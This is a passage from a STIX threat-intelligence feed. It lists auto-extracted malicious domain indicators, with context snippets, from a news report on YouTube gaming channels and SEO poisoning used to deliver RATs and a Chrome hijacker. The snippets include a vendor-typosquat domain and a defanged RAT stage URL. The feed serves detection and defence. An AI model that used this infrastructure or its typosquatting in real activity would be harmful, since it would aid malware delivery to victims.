Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: esdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xy","pattern":"[domain-name:value = 'boundarychickens.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--760a7a44-d933-441c-b571-b949a5df74df","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: boundaryfly.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz","pattern":"[domain-name:value = 'boundaryfly.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9c5c4f15-7391-4f4a-a090-887bc552eb79","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: boytank.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.","pattern":"[domain-name:value = 'boytank.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc4a2bff-7842-443f-b1c1-9ffdd2e07214","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: branchmorning.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: oatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[","pattern":"[domain-name:value = 'branchmorning.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4d31db68-834c-40f8-974c-b4b1e800d7f9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: breathdoctor.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ndarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.","pattern":"[domain-name:value = 'breathdoctor.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fe69c8ed-bfb2-40c1-8590-00d9328f5e5e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bubbleappliance.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: .believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; co","pattern":"[domain-name:value = 'bubbleappliance.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--46a8c08a-9d27-48f0-a339-c1b53c817d70","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bubbleslip.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]","pattern":"[domain-name:value = 'bubbleslip.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--07101f66-78fd-4411-bb83-72066d681429","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cabbagemeasure.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: anchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz","pattern":"[domain-name:value = 'cabbagemeasure.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cca6d489-e02a-4b97-b786-6e17bf52b7db","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cablecanvas.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: athdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz","pattern":"[domain-name:value = 'cablecanvas.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e1e9628-63ad-4345-a3d9-7aca3047997e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cableland.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz","pattern":"[domain-name:value = 'cableland.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83bbe045-1cc2-46ed-8e2f-276bcf75d9f5","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cardgrape.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: bbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz","pattern":"[domain-name:value = 'cardgrape.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--03146c31-94c1-48b3-a468-282f5da15977","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cattlegold.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: abbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate an","pattern":"[domain-name:value = 'cattlegold.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--52f81ef0-6a53-46e5-9f72-973e1a9ac53b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: celeryerror.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate and landing infrastruc","pattern":"[domain-name:value = 'celeryerror.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--167ffc5a-215a-48af-a729-0b0b6394b985","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: centscarf.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate and landing infrastructure Domain chalkp","pattern":"[domain-name:value = 'centscarf.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--45f4dc93-49da-4eef-b1d9-9524011321cb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: chalkprose.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rf[.]xyz CL-CRI-1171 gate and landing infrastructure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[","pattern":"[domain-name:value = 'chalkprose.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4814b036-98ac-4a90-9507-8e111f2435b6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: chawton.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: tructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader payload handoff and second-stage hosts Domain","pattern":"[domain-name:value = 'chawton.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c39c671a-43fd-4682-b3ec-a84efe0ff156","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cherriestruck.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 1 gate and landing infrastructure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]x","pattern":"[domain-name:value = 'cherriestruck.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--802c8d7d-1504-4a1f-9b3b-f7f97ad6f5a4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: chesstail.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: structure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]x","pattern":"[domain-name:value = 'chesstail.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5a310da3-4f56-484e-b9f7-b6054085321b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: chickensmine.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: halkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz","pattern":"[domain-name:value = 'chickensmine.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81312dbc-b10d-4a86-940a-6182b60ed024","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: chinexpert.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: t.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]x","pattern":"[domain-name:value = 'chinexpert.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--571e6d0f-a661-43ef-bdc3-2ccd18bc7368","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: churchpail.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: iestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz","pattern":"[domain-name:value = 'churchpail.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5e84a321-857a-4ba7-94df-d07e0357a7da","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: clothcrib.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate a","pattern":"[domain-name:value = 'clothcrib.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29eb9ab6-bbc0-44ee-bfbb-e59aad8ebadb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: clothcurrent.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate and landing infrastruc","pattern":"[domain-name:value = 'clothcurrent.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e3f6e75a-1975-4db6-85c6-36b2c438222e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: coatberry.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate and landing infrastructure Domain connec","pattern":"[domain-name:value = 'coatberry.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--57929042-4af9-4570-a964-c8826fd63b13","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: collartitle.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]o","pattern":"[domain-name:value = 'collartitle.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed940f85-8814-44e3-a9ac-681ea2367dd9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: conditiongrade.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: onnect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]x","pattern":"[domain-name:value = 'conditiongrade.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--169736f0-a3c3-4547-bed7-0624497a0217","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: coppersummer.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: t.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz","pattern":"[domain-name:value = 'coppersummer.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9ea1b72-f3c4-4eb4-8790-96ba2c09ab3d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: creatorcreator.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; con","pattern":"[domain-name:value = 'creatorcreator.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9eaa9863-56fb-45a7-ab3a-8fa73a96d0fb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: crowdstri.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: cript host Domain stryper[.]info ; aa.amazingshield[.]xyz ; crowdstri[.]com Insomnia RAT stage hosts and Python-agent C2 typosquat Do","pattern":"[domain-name:value = 'crowdstri.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2ebad33c-83ff-40e7-9b4a-9066a7a81602","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: drelto.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 6546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain stryper","pattern":"[domain-name:value = 'drelto.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bada12c3-4b37-4d03-85da-5807b312871b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: dresstent.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz","pattern":"[domain-name:value = 'dresstent.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--169a7dfc-cba6-4166-90c3-8c1251e0b60e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: dropjeans.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]x","pattern":"[domain-name:value = 'dropjeans.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--236d9cd6-cd33-4eaa-8fc4-5bf913c223b6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: edgeplayground.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]xyz CL-CRI-1171 installation-tra","pattern":"[domain-name:value = 'edgeplayground.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--028e9fdc-3444-4e22-896f-d9d948f02841","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: exchangeclub.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]xyz CL-CRI-1171 installation-tracker infrastructure Domain co","pattern":"[domain-name:value = 'exchangeclub.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b29e9718-cdbb-4997-8c0c-de0af2b4e2c0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: existencediscussion.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: CRI-1171 installation-tracker infrastructure Domain connect.existencediscussion[.]info ; connect.expansionsalt[.]info ; connect.fangstitch[.]xyz","pattern":"[domain-name:value = 